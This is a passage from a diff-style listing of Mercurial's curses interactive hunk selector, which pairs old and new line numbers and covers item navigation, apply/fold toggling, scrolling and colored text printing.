649 # when not set at all. This is to stay most compatible with
646 # when not set at all. This is to stay most compatible with
650 # previous (color only) behaviour.
647 # previous (color only) behaviour.
651 uicolor = stringutil.parsebool(self.ui.config(b'ui', b'color'))
648 uicolor = stringutil.parsebool(self.ui.config(b'ui', b'color'))
652 self.usecolor = uicolor is not False
649 self.usecolor = uicolor is not False
653
650
654 # the currently selected header, hunk, or hunk-line
651 # the currently selected header, hunk, or hunk-line
655 self.currentselecteditem = self.headerlist[0]
652 self.currentselecteditem = self.headerlist[0]
656 self.lastapplieditem = None
653 self.lastapplieditem = None
657
654
658 # updated when printing out patch-display -- the 'lines' here are the
655 # updated when printing out patch-display -- the 'lines' here are the
659 # line positions *in the pad*, not on the screen.
656 # line positions *in the pad*, not on the screen.
660 self.selecteditemstartline = 0
657 self.selecteditemstartline = 0
661 self.selecteditemendline = None
658 self.selecteditemendline = None
662
659
663 # define indentation levels
660 # define indentation levels
664 self.headerindentnumchars = 0
661 self.headerindentnumchars = 0
665 self.hunkindentnumchars = 3
662 self.hunkindentnumchars = 3
666 self.hunklineindentnumchars = 6
663 self.hunklineindentnumchars = 6
667
664
668 # the first line of the pad to print to the screen
665 # the first line of the pad to print to the screen
669 self.firstlineofpadtoprint = 0
666 self.firstlineofpadtoprint = 0
670
667
671 # keeps track of the number of lines in the pad
668 # keeps track of the number of lines in the pad
672 self.numpadlines = None
669 self.numpadlines = None
673
670
674 self.numstatuslines = 1
671 self.numstatuslines = 1
675
672
676 # keep a running count of the number of lines printed to the pad
673 # keep a running count of the number of lines printed to the pad
677 # (used for determining when the selected item begins/ends)
674 # (used for determining when the selected item begins/ends)
678 self.linesprintedtopadsofar = 0
675 self.linesprintedtopadsofar = 0
679
676
680 # stores optional text for a commit comment provided by the user
677 # stores optional text for a commit comment provided by the user
681 self.commenttext = b""
678 self.commenttext = b""
682
679
683 # if the last 'toggle all' command caused all changes to be applied
680 # if the last 'toggle all' command caused all changes to be applied
684 self.waslasttoggleallapplied = True
681 self.waslasttoggleallapplied = True
685
682
686 # affects some ui text
683 # affects some ui text
687 if operation not in _headermessages:
684 if operation not in _headermessages:
688 raise error.ProgrammingError(
685 raise error.ProgrammingError(
689 b'unexpected operation: %s' % operation
686 b'unexpected operation: %s' % operation
690 )
687 )
691 self.operation = operation
688 self.operation = operation
692
689
693 def uparrowevent(self):
690 def uparrowevent(self):
694 """
691 """
695 try to select the previous item to the current item that has the
692 try to select the previous item to the current item that has the
696 most-indented level. for example, if a hunk is selected, try to select
693 most-indented level. for example, if a hunk is selected, try to select
697 the last hunkline of the hunk prior to the selected hunk. or, if
694 the last hunkline of the hunk prior to the selected hunk. or, if
698 the first hunkline of a hunk is currently selected, then select the
695 the first hunkline of a hunk is currently selected, then select the
699 hunk itself.
696 hunk itself.
700 """
697 """
701 currentitem = self.currentselecteditem
698 currentitem = self.currentselecteditem
702
699
703 nextitem = currentitem.previtem()
700 nextitem = currentitem.previtem()
704
701
705 if nextitem is None:
702 if nextitem is None:
706 # if no parent item (i.e. currentitem is the first header), then
703 # if no parent item (i.e. currentitem is the first header), then
707 # no change...
704 # no change...
708 nextitem = currentitem
705 nextitem = currentitem
709
706
710 self.currentselecteditem = nextitem
707 self.currentselecteditem = nextitem
711
708
712 def uparrowshiftevent(self):
709 def uparrowshiftevent(self):
713 """
710 """
714 select (if possible) the previous item on the same level as the
711 select (if possible) the previous item on the same level as the
715 currently selected item. otherwise, select (if possible) the
712 currently selected item. otherwise, select (if possible) the
716 parent-item of the currently selected item.
713 parent-item of the currently selected item.
717 """
714 """
718 currentitem = self.currentselecteditem
715 currentitem = self.currentselecteditem
719 nextitem = currentitem.prevsibling()
716 nextitem = currentitem.prevsibling()
720 # if there's no previous sibling, try choosing the parent
717 # if there's no previous sibling, try choosing the parent
721 if nextitem is None:
718 if nextitem is None:
722 nextitem = currentitem.parentitem()
719 nextitem = currentitem.parentitem()
723 if nextitem is None:
720 if nextitem is None:
724 # if no parent item (i.e. currentitem is the first header), then
721 # if no parent item (i.e. currentitem is the first header), then
725 # no change...
722 # no change...
726 nextitem = currentitem
723 nextitem = currentitem
727
724
728 self.currentselecteditem = nextitem
725 self.currentselecteditem = nextitem
729 self.recenterdisplayedarea()
726 self.recenterdisplayedarea()
730
727
731 def downarrowevent(self):
728 def downarrowevent(self):
732 """
729 """
733 try to select the next item to the current item that has the
730 try to select the next item to the current item that has the
734 most-indented level. for example, if a hunk is selected, select
731 most-indented level. for example, if a hunk is selected, select
735 the first hunkline of the selected hunk. or, if the last hunkline of
732 the first hunkline of the selected hunk. or, if the last hunkline of
736 a hunk is currently selected, then select the next hunk, if one exists,
733 a hunk is currently selected, then select the next hunk, if one exists,
737 or if not, the next header if one exists.
734 or if not, the next header if one exists.
738 """
735 """
739 # self.startprintline += 1 #debug
736 # self.startprintline += 1 #debug
740 currentitem = self.currentselecteditem
737 currentitem = self.currentselecteditem
741
738
742 nextitem = currentitem.nextitem()
739 nextitem = currentitem.nextitem()
743 # if there's no next item, keep the selection as-is
740 # if there's no next item, keep the selection as-is
744 if nextitem is None:
741 if nextitem is None:
745 nextitem = currentitem
742 nextitem = currentitem
746
743
747 self.currentselecteditem = nextitem
744 self.currentselecteditem = nextitem
748
745
749 def downarrowshiftevent(self):
746 def downarrowshiftevent(self):
750 """
747 """
751 select (if possible) the next item on the same level as the currently
748 select (if possible) the next item on the same level as the currently
752 selected item. otherwise, select (if possible) the next item on the
749 selected item. otherwise, select (if possible) the next item on the
753 same level as the parent item of the currently selected item.
750 same level as the parent item of the currently selected item.
754 """
751 """
755 currentitem = self.currentselecteditem
752 currentitem = self.currentselecteditem
756 nextitem = currentitem.nextsibling()
753 nextitem = currentitem.nextsibling()
757 # if there's no next sibling, try choosing the parent's nextsibling
754 # if there's no next sibling, try choosing the parent's nextsibling
758 if nextitem is None:
755 if nextitem is None:
759 try:
756 try:
760 nextitem = currentitem.parentitem().nextsibling()
757 nextitem = currentitem.parentitem().nextsibling()
761 except AttributeError:
758 except AttributeError:
762 # parentitem returned None, so nextsibling() can't be called
759 # parentitem returned None, so nextsibling() can't be called
763 nextitem = None
760 nextitem = None
764 if nextitem is None:
761 if nextitem is None:
765 # if parent has no next sibling, then no change...
762 # if parent has no next sibling, then no change...
766 nextitem = currentitem
763 nextitem = currentitem
767
764
768 self.currentselecteditem = nextitem
765 self.currentselecteditem = nextitem
769 self.recenterdisplayedarea()
766 self.recenterdisplayedarea()
770
767
771 def nextsametype(self, test=False):
768 def nextsametype(self, test=False):
772 currentitem = self.currentselecteditem
769 currentitem = self.currentselecteditem
773 sametype = lambda item: isinstance(item, type(currentitem))
770 sametype = lambda item: isinstance(item, type(currentitem))
774 nextitem = currentitem.nextitem()
771 nextitem = currentitem.nextitem()
775
772
776 while nextitem is not None and not sametype(nextitem):
773 while nextitem is not None and not sametype(nextitem):
777 nextitem = nextitem.nextitem()
774 nextitem = nextitem.nextitem()
778
775
779 if nextitem is None:
776 if nextitem is None:
780 nextitem = currentitem
777 nextitem = currentitem
781 else:
778 else:
782 parent = nextitem.parentitem()
779 parent = nextitem.parentitem()
783 if parent is not None and parent.folded:
780 if parent is not None and parent.folded:
784 self.togglefolded(parent)
781 self.togglefolded(parent)
785
782
786 self.currentselecteditem = nextitem
783 self.currentselecteditem = nextitem
787 if not test:
784 if not test:
788 self.recenterdisplayedarea()
785 self.recenterdisplayedarea()
789
786
790 def rightarrowevent(self):
787 def rightarrowevent(self):
791 """
788 """
792 select (if possible) the first of this item's child-items.
789 select (if possible) the first of this item's child-items.
793 """
790 """
794 currentitem = self.currentselecteditem
791 currentitem = self.currentselecteditem
795 nextitem = currentitem.firstchild()
792 nextitem = currentitem.firstchild()
796
793
797 # turn off folding if we want to show a child-item
794 # turn off folding if we want to show a child-item
798 if currentitem.folded:
795 if currentitem.folded:
799 self.togglefolded(currentitem)
796 self.togglefolded(currentitem)
800
797
801 if nextitem is None:
798 if nextitem is None:
802 # if no next item on parent-level, then no change...
799 # if no next item on parent-level, then no change...
803 nextitem = currentitem
800 nextitem = currentitem
804
801
805 self.currentselecteditem = nextitem
802 self.currentselecteditem = nextitem
806
803
807 def leftarrowevent(self):
804 def leftarrowevent(self):
808 """
805 """
809 if the current item can be folded (i.e. it is an unfolded header or
806 if the current item can be folded (i.e. it is an unfolded header or
810 hunk), then fold it. otherwise try select (if possible) the parent
807 hunk), then fold it. otherwise try select (if possible) the parent
811 of this item.
808 of this item.
812 """
809 """
813 currentitem = self.currentselecteditem
810 currentitem = self.currentselecteditem
814
811
815 # try to fold the item
812 # try to fold the item
816 if not isinstance(currentitem, uihunkline):
813 if not isinstance(currentitem, uihunkline):
817 if not currentitem.folded:
814 if not currentitem.folded:
818 self.togglefolded(item=currentitem)
815 self.togglefolded(item=currentitem)
819 return
816 return
820
817
821 # if it can't be folded, try to select the parent item
818 # if it can't be folded, try to select the parent item
822 nextitem = currentitem.parentitem()
819 nextitem = currentitem.parentitem()
823
820
824 if nextitem is None:
821 if nextitem is None:
825 # if no item on parent-level, then no change...
822 # if no item on parent-level, then no change...
826 nextitem = currentitem
823 nextitem = currentitem
827 if not nextitem.folded:
824 if not nextitem.folded:
828 self.togglefolded(item=nextitem)
825 self.togglefolded(item=nextitem)
829
826
830 self.currentselecteditem = nextitem
827 self.currentselecteditem = nextitem
831
828
832 def leftarrowshiftevent(self):
829 def leftarrowshiftevent(self):
833 """
830 """
834 select the header of the current item (or fold current item if the
831 select the header of the current item (or fold current item if the
835 current item is already a header).
832 current item is already a header).
836 """
833 """
837 currentitem = self.currentselecteditem
834 currentitem = self.currentselecteditem
838
835
839 if isinstance(currentitem, uiheader):
836 if isinstance(currentitem, uiheader):
840 if not currentitem.folded:
837 if not currentitem.folded:
841 self.togglefolded(item=currentitem)
838 self.togglefolded(item=currentitem)
842 return
839 return
843
840
844 # select the parent item recursively until we're at a header
841 # select the parent item recursively until we're at a header
845 while True:
842 while True:
846 nextitem = currentitem.parentitem()
843 nextitem = currentitem.parentitem()
847 if nextitem is None:
844 if nextitem is None:
848 break
845 break
849 else:
846 else:
850 currentitem = nextitem
847 currentitem = nextitem
851
848
852 self.currentselecteditem = currentitem
849 self.currentselecteditem = currentitem
853
850
854 def updatescroll(self):
851 def updatescroll(self):
855 """scroll the screen to fully show the currently-selected"""
852 """scroll the screen to fully show the currently-selected"""
856 selstart = self.selecteditemstartline
853 selstart = self.selecteditemstartline
857 selend = self.selecteditemendline
854 selend = self.selecteditemendline
858
855
859 padstart = self.firstlineofpadtoprint
856 padstart = self.firstlineofpadtoprint
860 padend = padstart + self.yscreensize - self.numstatuslines - 1
857 padend = padstart + self.yscreensize - self.numstatuslines - 1
861 # 'buffered' pad start/end values which scroll with a certain
858 # 'buffered' pad start/end values which scroll with a certain
862 # top/bottom context margin
859 # top/bottom context margin
863 padstartbuffered = padstart + 3
860 padstartbuffered = padstart + 3
864 padendbuffered = padend - 3
861 padendbuffered = padend - 3
865
862
866 if selend > padendbuffered:
863 if selend > padendbuffered:
867 self.scrolllines(selend - padendbuffered)
864 self.scrolllines(selend - padendbuffered)
868 elif selstart < padstartbuffered:
865 elif selstart < padstartbuffered:
869 # negative values scroll in pgup direction
866 # negative values scroll in pgup direction
870 self.scrolllines(selstart - padstartbuffered)
867 self.scrolllines(selstart - padstartbuffered)
871
868
872 def scrolllines(self, numlines):
869 def scrolllines(self, numlines):
873 """scroll the screen up (down) by numlines when numlines >0 (<0)."""
870 """scroll the screen up (down) by numlines when numlines >0 (<0)."""
874 self.firstlineofpadtoprint += numlines
871 self.firstlineofpadtoprint += numlines
875 if self.firstlineofpadtoprint < 0:
872 if self.firstlineofpadtoprint < 0:
876 self.firstlineofpadtoprint = 0
873 self.firstlineofpadtoprint = 0
877 if self.firstlineofpadtoprint > self.numpadlines - 1:
874 if self.firstlineofpadtoprint > self.numpadlines - 1:
878 self.firstlineofpadtoprint = self.numpadlines - 1
875 self.firstlineofpadtoprint = self.numpadlines - 1
879
876
880 def toggleapply(self, item=None):
877 def toggleapply(self, item=None):
881 """
878 """
882 toggle the applied flag of the specified item. if no item is specified,
879 toggle the applied flag of the specified item. if no item is specified,
883 toggle the flag of the currently selected item.
880 toggle the flag of the currently selected item.
884 """
881 """
885 if item is None:
882 if item is None:
886 item = self.currentselecteditem
883 item = self.currentselecteditem
887 # Only set this when NOT using 'toggleall'
884 # Only set this when NOT using 'toggleall'
888 self.lastapplieditem = item
885 self.lastapplieditem = item
889
886
890 item.applied = not item.applied
887 item.applied = not item.applied
891
888
892 if isinstance(item, uiheader):
889 if isinstance(item, uiheader):
893 item.partial = False
890 item.partial = False
894 if item.applied:
891 if item.applied:
895 # apply all its hunks
892 # apply all its hunks
896 for hnk in item.hunks:
893 for hnk in item.hunks:
897 hnk.applied = True
894 hnk.applied = True
898 # apply all their hunklines
895 # apply all their hunklines
899 for hunkline in hnk.changedlines:
896 for hunkline in hnk.changedlines:
900 hunkline.applied = True
897 hunkline.applied = True
901 else:
898 else:
902 # un-apply all its hunks
899 # un-apply all its hunks
903 for hnk in item.hunks:
900 for hnk in item.hunks:
904 hnk.applied = False
901 hnk.applied = False
905 hnk.partial = False
902 hnk.partial = False
906 # un-apply all their hunklines
903 # un-apply all their hunklines
907 for hunkline in hnk.changedlines:
904 for hunkline in hnk.changedlines:
908 hunkline.applied = False
905 hunkline.applied = False
909 elif isinstance(item, uihunk):
906 elif isinstance(item, uihunk):
910 item.partial = False
907 item.partial = False
911 # apply all it's hunklines
908 # apply all it's hunklines
912 for hunkline in item.changedlines:
909 for hunkline in item.changedlines:
913 hunkline.applied = item.applied
910 hunkline.applied = item.applied
914
911
915 siblingappliedstatus = [hnk.applied for hnk in item.header.hunks]
912 siblingappliedstatus = [hnk.applied for hnk in item.header.hunks]
916 allsiblingsapplied = not (False in siblingappliedstatus)
913 allsiblingsapplied = not (False in siblingappliedstatus)
917 nosiblingsapplied = not (True in siblingappliedstatus)
914 nosiblingsapplied = not (True in siblingappliedstatus)
918
915
919 siblingspartialstatus = [hnk.partial for hnk in item.header.hunks]
916 siblingspartialstatus = [hnk.partial for hnk in item.header.hunks]
920 somesiblingspartial = True in siblingspartialstatus
917 somesiblingspartial = True in siblingspartialstatus
921
918
922 # cases where applied or partial should be removed from header
919 # cases where applied or partial should be removed from header
923
920
924 # if no 'sibling' hunks are applied (including this hunk)
921 # if no 'sibling' hunks are applied (including this hunk)
925 if nosiblingsapplied:
922 if nosiblingsapplied:
926 if not item.header.special():
923 if not item.header.special():
927 item.header.applied = False
924 item.header.applied = False
928 item.header.partial = False
925 item.header.partial = False
929 else: # some/all parent siblings are applied
926 else: # some/all parent siblings are applied
930 item.header.applied = True
927 item.header.applied = True
931 item.header.partial = (
928 item.header.partial = (
932 somesiblingspartial or not allsiblingsapplied
929 somesiblingspartial or not allsiblingsapplied
933 )
930 )
934
931
935 elif isinstance(item, uihunkline):
932 elif isinstance(item, uihunkline):
936 siblingappliedstatus = [ln.applied for ln in item.hunk.changedlines]
933 siblingappliedstatus = [ln.applied for ln in item.hunk.changedlines]
937 allsiblingsapplied = not (False in siblingappliedstatus)
934 allsiblingsapplied = not (False in siblingappliedstatus)
938 nosiblingsapplied = not (True in siblingappliedstatus)
935 nosiblingsapplied = not (True in siblingappliedstatus)
939
936
940 # if no 'sibling' lines are applied
937 # if no 'sibling' lines are applied
941 if nosiblingsapplied:
938 if nosiblingsapplied:
942 item.hunk.applied = False
939 item.hunk.applied = False
943 item.hunk.partial = False
940 item.hunk.partial = False
944 elif allsiblingsapplied:
941 elif allsiblingsapplied:
945 item.hunk.applied = True
942 item.hunk.applied = True
946 item.hunk.partial = False
943 item.hunk.partial = False
947 else: # some siblings applied
944 else: # some siblings applied
948 item.hunk.applied = True
945 item.hunk.applied = True
949 item.hunk.partial = True
946 item.hunk.partial = True
950
947
951 parentsiblingsapplied = [
948 parentsiblingsapplied = [
952 hnk.applied for hnk in item.hunk.header.hunks
949 hnk.applied for hnk in item.hunk.header.hunks
953 ]
950 ]
954 noparentsiblingsapplied = not (True in parentsiblingsapplied)
951 noparentsiblingsapplied = not (True in parentsiblingsapplied)
955 allparentsiblingsapplied = not (False in parentsiblingsapplied)
952 allparentsiblingsapplied = not (False in parentsiblingsapplied)
956
953
957 parentsiblingspartial = [
954 parentsiblingspartial = [
958 hnk.partial for hnk in item.hunk.header.hunks
955 hnk.partial for hnk in item.hunk.header.hunks
959 ]
956 ]
960 someparentsiblingspartial = True in parentsiblingspartial
957 someparentsiblingspartial = True in parentsiblingspartial
961
958
962 # if all parent hunks are not applied, un-apply header
959 # if all parent hunks are not applied, un-apply header
963 if noparentsiblingsapplied:
960 if noparentsiblingsapplied:
964 if not item.hunk.header.special():
961 if not item.hunk.header.special():
965 item.hunk.header.applied = False
962 item.hunk.header.applied = False
966 item.hunk.header.partial = False
963 item.hunk.header.partial = False
967 # set the applied and partial status of the header if needed
964 # set the applied and partial status of the header if needed
968 else: # some/all parent siblings are applied
965 else: # some/all parent siblings are applied
969 item.hunk.header.applied = True
966 item.hunk.header.applied = True
970 item.hunk.header.partial = (
967 item.hunk.header.partial = (
971 someparentsiblingspartial or not allparentsiblingsapplied
968 someparentsiblingspartial or not allparentsiblingsapplied
972 )
969 )
973
970
974 def toggleall(self):
971 def toggleall(self):
975 """toggle the applied flag of all items."""
972 """toggle the applied flag of all items."""
976 if self.waslasttoggleallapplied: # then unapply them this time
973 if self.waslasttoggleallapplied: # then unapply them this time
977 for item in self.headerlist:
974 for item in self.headerlist:
978 if item.applied:
975 if item.applied:
979 self.toggleapply(item)
976 self.toggleapply(item)
980 else:
977 else:
981 for item in self.headerlist:
978 for item in self.headerlist:
982 if not item.applied:
979 if not item.applied:
983 self.toggleapply(item)
980 self.toggleapply(item)
984 self.waslasttoggleallapplied = not self.waslasttoggleallapplied
981 self.waslasttoggleallapplied = not self.waslasttoggleallapplied
985
982
986 def flipselections(self):
983 def flipselections(self):
987 """
984 """
988 Flip all selections. Every selected line is unselected and vice
985 Flip all selections. Every selected line is unselected and vice
989 versa.
986 versa.
990 """
987 """
991 for header in self.headerlist:
988 for header in self.headerlist:
992 for hunk in header.allchildren():
989 for hunk in header.allchildren():
993 for line in hunk.allchildren():
990 for line in hunk.allchildren():
994 self.toggleapply(line)
991 self.toggleapply(line)
995
992
996 def toggleallbetween(self):
993 def toggleallbetween(self):
997 """toggle applied on or off for all items in range [lastapplied,
994 """toggle applied on or off for all items in range [lastapplied,
998 current]. """
995 current]. """
999 if (
996 if (
1000 not self.lastapplieditem
997 not self.lastapplieditem
1001 or self.currentselecteditem == self.lastapplieditem
998 or self.currentselecteditem == self.lastapplieditem
1002 ):
999 ):
1003 # Treat this like a normal 'x'/' '
1000 # Treat this like a normal 'x'/' '
1004 self.toggleapply()
1001 self.toggleapply()
1005 return
1002 return
1006
1003
1007 startitem = self.lastapplieditem
1004 startitem = self.lastapplieditem
1008 enditem = self.currentselecteditem
1005 enditem = self.currentselecteditem
1009 # Verify that enditem is "after" startitem, otherwise swap them.
1006 # Verify that enditem is "after" startitem, otherwise swap them.
1010 for direction in [b'forward', b'reverse']:
1007 for direction in [b'forward', b'reverse']:
1011 nextitem = startitem.nextitem()
1008 nextitem = startitem.nextitem()
1012 while nextitem and nextitem != enditem:
1009 while nextitem and nextitem != enditem:
1013 nextitem = nextitem.nextitem()
1010 nextitem = nextitem.nextitem()
1014 if nextitem:
1011 if nextitem:
1015 break
1012 break
1016 # Looks like we went the wrong direction :)
1013 # Looks like we went the wrong direction :)
1017 startitem, enditem = enditem, startitem
1014 startitem, enditem = enditem, startitem
1018
1015
1019 if not nextitem:
1016 if not nextitem:
1020 # We didn't find a path going either forward or backward? Don't know
1017 # We didn't find a path going either forward or backward? Don't know
1021 # how this can happen, let's not crash though.
1018 # how this can happen, let's not crash though.
1022 return
1019 return
1023
1020
1024 nextitem = startitem
1021 nextitem = startitem
1025 # Switch all items to be the opposite state of the currently selected
1022 # Switch all items to be the opposite state of the currently selected
1026 # item. Specifically:
1023 # item. Specifically:
1027 # [ ] startitem
1024 # [ ] startitem
1028 # [x] middleitem
1025 # [x] middleitem
1029 # [ ] enditem <-- currently selected
1026 # [ ] enditem <-- currently selected
1030 # This will turn all three on, since the currently selected item is off.
1027 # This will turn all three on, since the currently selected item is off.
1031 # This does *not* invert each item (i.e. middleitem stays marked/on)
1028 # This does *not* invert each item (i.e. middleitem stays marked/on)
1032 desiredstate = not self.currentselecteditem.applied
1029 desiredstate = not self.currentselecteditem.applied
1033 while nextitem != enditem.nextitem():
1030 while nextitem != enditem.nextitem():
1034 if nextitem.applied != desiredstate:
1031 if nextitem.applied != desiredstate:
1035 self.toggleapply(item=nextitem)
1032 self.toggleapply(item=nextitem)
1036 nextitem = nextitem.nextitem()
1033 nextitem = nextitem.nextitem()
1037
1034
1038 def togglefolded(self, item=None, foldparent=False):
1035 def togglefolded(self, item=None, foldparent=False):
1039 """toggle folded flag of specified item (defaults to currently
1036 """toggle folded flag of specified item (defaults to currently
1040 selected)"""
1037 selected)"""
1041 if item is None:
1038 if item is None:
1042 item = self.currentselecteditem
1039 item = self.currentselecteditem
1043 if foldparent or (isinstance(item, uiheader) and item.neverunfolded):
1040 if foldparent or (isinstance(item, uiheader) and item.neverunfolded):
1044 if not isinstance(item, uiheader):
1041 if not isinstance(item, uiheader):
1045 # we need to select the parent item in this case
1042 # we need to select the parent item in this case
1046 self.currentselecteditem = item = item.parentitem()
1043 self.currentselecteditem = item = item.parentitem()
1047 elif item.neverunfolded:
1044 elif item.neverunfolded:
1048 item.neverunfolded = False
1045 item.neverunfolded = False
1049
1046
1050 # also fold any foldable children of the parent/current item
1047 # also fold any foldable children of the parent/current item
1051 if isinstance(item, uiheader): # the original or 'new' item
1048 if isinstance(item, uiheader): # the original or 'new' item
1052 for child in item.allchildren():
1049 for child in item.allchildren():
1053 child.folded = not item.folded
1050 child.folded = not item.folded
1054
1051
1055 if isinstance(item, (uiheader, uihunk)):
1052 if isinstance(item, (uiheader, uihunk)):
1056 item.folded = not item.folded
1053 item.folded = not item.folded
1057
1054
1058 def alignstring(self, instr, window):
1055 def alignstring(self, instr, window):
1059 """
1056 """
1060 add whitespace to the end of a string in order to make it fill
1057 add whitespace to the end of a string in order to make it fill
1061 the screen in the x direction. the current cursor position is
1058 the screen in the x direction. the current cursor position is
1062 taken into account when making this calculation. the string can span
1059 taken into account when making this calculation. the string can span
1063 multiple lines.
1060 multiple lines.
1064 """
1061 """
1065 y, xstart = window.getyx()
1062 y, xstart = window.getyx()
1066 width = self.xscreensize
1063 width = self.xscreensize
1067 # turn tabs into spaces
1064 # turn tabs into spaces
1068 instr = instr.expandtabs(4)
1065 instr = instr.expandtabs(4)
1069 strwidth = encoding.colwidth(instr)
1066 strwidth = encoding.colwidth(instr)
1070 numspaces = width - ((strwidth + xstart) % width)
1067 numspaces = width - ((strwidth + xstart) % width)
1071 return instr + b" " * numspaces
1068 return instr + b" " * numspaces
1072
1069
1073 def printstring(
1070 def printstring(
1074 self,
1071 self,
1075 window,
1072 window,
1076 text,
1073 text,
1077 fgcolor=None,
1074 fgcolor=None,
1078 bgcolor=None,
1075 bgcolor=None,
1079 pair=None,
1076 pair=None,
1080 pairname=None,
1077 pairname=None,
1081 attrlist=None,
1078 attrlist=None,
1082 towin=True,
1079 towin=True,
1083 align=True,
1080 align=True,
1084 showwhtspc=False,
1081 showwhtspc=False,
1085 ):
1082 ):
1086 """
1083 """
1087 print the string, text, with the specified colors and attributes, to
1084 print the string, text, with the specified colors and attributes, to
1088 the specified curses window object.
1085 the specified curses window object.
1089
1086
1090 the foreground and background colors are of the form
1087 the foreground and background colors are of the form
1091 curses.color_xxxx, where xxxx is one of: [black, blue, cyan, green,
1088 curses.color_xxxx, where xxxx is one of: [black, blue, cyan, green,
1092 magenta, red, white, yellow]. if pairname is provided, a color
1089 magenta, red, white, yellow]. if pairname is provided, a color
1093 pair will be looked up in the self.colorpairnames dictionary.
1090 pair will be looked up in the self.colorpairnames dictionary.
1094
1091
1095 attrlist is a list containing text attributes in the form of
1092 attrlist is a list containing text attributes in the form of
1096 curses.a_xxxx, where xxxx can be: [bold, dim, normal, standout,
1093 curses.a_xxxx, where xxxx can be: [bold, dim, normal, standout,
1097 underline].
1094 underline].
1098
1095
1099 if align == True, whitespace is added to the printed string such that
1096 if align == True, whitespace is added to the printed string such that
1100 the string stretches to the right border of the window.
1097 the string stretches to the right border of the window.
1101
1098
1102 if showwhtspc == True, trailing whitespace of a string is highlighted.
1099 if showwhtspc == True, trailing whitespace of a string is highlighted.
1103 """
1100 """
1104 # preprocess the text, converting tabs to spaces
1101 # preprocess the text, converting tabs to spaces
1105 text = text.expandtabs(4)
1102 text = text.expandtabs(4)
1106 # strip \n, and convert control characters to ^[char] representation
1103 # strip \n, and convert control characters to ^[char] representation
1107 text = re.sub(
1104 text = re.sub(
1108 br'[\x00-\x08\x0a-\x1f]',
1105 br'[\x00-\x08\x0a-\x1f]',
1109 lambda m: b'^' + pycompat.sysbytes(chr(ord(m.group()) + 64)),
1106 lambda m: b'^' + pycompat.sysbytes(chr(ord(m.group()) + 64)),
1110 text.strip(b'\n'),
1107 text.strip(b'\n'),
1111 )
1108 )
1112
1109
1113 if pair is not None:
1110 if pair is not None:
1114 colorpair = pair
1111 colorpair = pair
1115 elif pairname is not None:
1112 elif pairname is not None:
1116 colorpair = self.colorpairnames[pairname]
1113 colorpair = self.colorpairnames[pairname]
1117 else:
1114 else:
1118 if fgcolor is None:
1115 if fgcolor is None:
1119 fgcolor = -1
1116 fgcolor = -1
1120 if bgcolor is None:
1117 if bgcolor is None:
1121 bgcolor = -1
1118 bgcolor = -1
1122 if (fgcolor, bgcolor) in self.colorpairs:
1119 if (fgcolor, bgcolor) in self.colorpairs:
1123 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1120 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1124 else:
1121 else:
1125 colorpair = self.getcolorpair(fgcolor, bgcolor)
1122 colorpair = self.getcolorpair(fgcolor, bgcolor)
1126 # add attributes if possible
1123 # add attributes if possible
1127 if attrlist is None:
1124 if attrlist is None:
1128 attrlist = []
1125 attrlist = []
1129 if colorpair < 256:
1126 if colorpair < 256:
1130 # then it is safe to apply all attributes
1127 # then it is safe to apply all attributes
1131 for textattr in attrlist:
1128 for textattr in attrlist:
1132 colorpair |= textattr
1129 colorpair |= textattr
1133 else:
1130 else:
1134 # just apply a select few (safe?) attributes
1131 # just apply a select few (safe?) attributes
1135 for textattr in (curses.A_UNDERLINE, curses.A_BOLD):
1132 for textattr in (curses.A_UNDERLINE, curses.A_BOLD):
1136 if textattr in attrlist:
1133 if textattr in attrlist:
1137 colorpair |= textattr
1134 colorpair |= textattr
1138
1135
1139 y, xstart = self.chunkpad.getyx()
1136 y, xstart = self.chunkpad.getyx()
1140 t = b"" # variable for counting lines printed
1137 t = b"" # variable for counting lines printed
1141 # if requested, show trailing whitespace
1138 # if requested, show trailing whitespace
1142 if showwhtspc:
1139 if showwhtspc:
1143 origlen = len(text)
1140 origlen = len(text)
1144 text = text.rstrip(b' \n') # tabs have already been expanded
1141 text = text.rstrip(b' \n') # tabs have already been expanded
1145 strippedlen = len(text)
1142 strippedlen = len(text)
1146 numtrailingspaces = origlen - strippedlen
1143 numtrailingspaces = origlen - strippedlen
1147
1144
1148 if towin:
1145 if towin:
1149 window.addstr(text, colorpair)
1146 window.addstr(text, colorpair)
1150 t += text
1147 t += text
1151
1148
1152 if showwhtspc:
1149 if showwhtspc:
1153 wscolorpair = colorpair | curses.A_REVERSE
1150 wscolorpair = colorpair | curses.A_REVERSE
1154 if towin:
1151 if towin:
1155 for i in range(numtrailingspaces):
1152 for i in range(numtrailingspaces):
1156 window.addch(curses.ACS_CKBOARD, wscolorpair)
1153 window.addch(curses.ACS_CKBOARD, wscolorpair)
1157 t += b" " * numtrailingspaces
1154 t += b" " * numtrailingspaces
1158
1155
1159 if align:
1156 if align:
1160 if towin:
1157 if towin:
1161 extrawhitespace = self.alignstring(b"", window)
1158 extrawhitespace = self.alignstring(b"", window)
1162 window.addstr(extrawhitespace, colorpair)
1159 window.addstr(extrawhitespace, colorpair)
1163 else:
1160 else:
1164 # need to use t, since the x position hasn't incremented
1161 # need to use t, since the x position hasn't incremented
1165 extrawhitespace = self.alignstring(t, window)
1162 extrawhitespace = self.alignstring(t, window)
1166 t += extrawhitespace
1163 t += extrawhitespace
1167
1164
1168 # is reset to 0 at the beginning of printitem()
1165 # is reset to 0 at the beginning of printitem()
1169
1166
1170 linesprinted = (xstart + len(t)) // self.xscreensize
1167 linesprinted = (xstart + len(t)) // self.xscreensize
1171 self.linesprintedtopadsofar += linesprinted
1168 self.linesprintedtopadsofar += linesprinted
1172 return t
1169 return t
1173
1170
1174 def _getstatuslinesegments(self):
1171 def _getstatuslinesegments(self):
1175 """-> [str]. return segments"""
1172 """-> [str]. return segments"""
1176 selected = self.currentselecteditem.applied
1173 selected = self.currentselecteditem.applied
1177 spaceselect = _(b'space/enter: select')
1174 spaceselect = _(b'space/enter: select')
1178 spacedeselect = _(b'space/enter: deselect')
1175 spacedeselect = _(b'space/enter: deselect')
1179 # Format the selected label into a place as long as the longer of the
1176 # Format the selected label into a place as long as the longer of the
1180 # two possible labels. This may vary by language.
1177 # two possible labels. This may vary by language.
1181 spacelen = max(len(spaceselect), len(spacedeselect))
1178 spacelen = max(len(spaceselect), len(spacedeselect))
1182 selectedlabel = b'%-*s' % (
1179 selectedlabel = b'%-*s' % (
1183 spacelen,
1180 spacelen,
1184 spacedeselect if selected else spaceselect,
1181 spacedeselect if selected else spaceselect,
1185 )
1182 )
1186 segments = [
1183 segments = [
1187 _headermessages[self.operation],
